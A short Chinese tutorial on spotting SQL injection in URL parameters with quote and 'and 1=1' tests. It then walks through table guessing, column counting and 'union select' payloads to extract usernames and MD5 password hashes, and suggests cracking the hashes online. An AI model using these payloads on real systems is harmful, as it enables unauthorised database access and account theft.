网站SQL注入漏洞检测

针对网页get请求，在传入后台程序参数时，需要预防SQL注入漏洞。

漏洞检测

针对网址http://页面/….?id=113
1、先尝试在地址栏加个单引号，http://页面/....?id=113'看返回的页面是否有变化，如果有变化，说明这个网页可能存在漏洞
2、再尝试在地址栏后面加上and 1=1，http://页面/....?id=113 and 1=1看看页面有没有变化，如果显示正常，而加上and 1=2，网页显示不正常。

账号破解

（1）猜表名

and exists (select * from 表名)

不断去尝试表名，不过大多账号表名都大体相似，需要猜解。

（2）猜字段
把第一步的select * 改成select 字段

（3）获取到字段之后，使用order by 数字看一共有多少个字段，逐个尝试。比如说一共6个字段

（4）使用联合查询

and 1=2 union select 1,2,3,4,5,6 from 表名

使用字段替换，获取到用户名和密码，一般密码都是MD5加密，拿到MD5加密之后就可以在各大网站上猜解。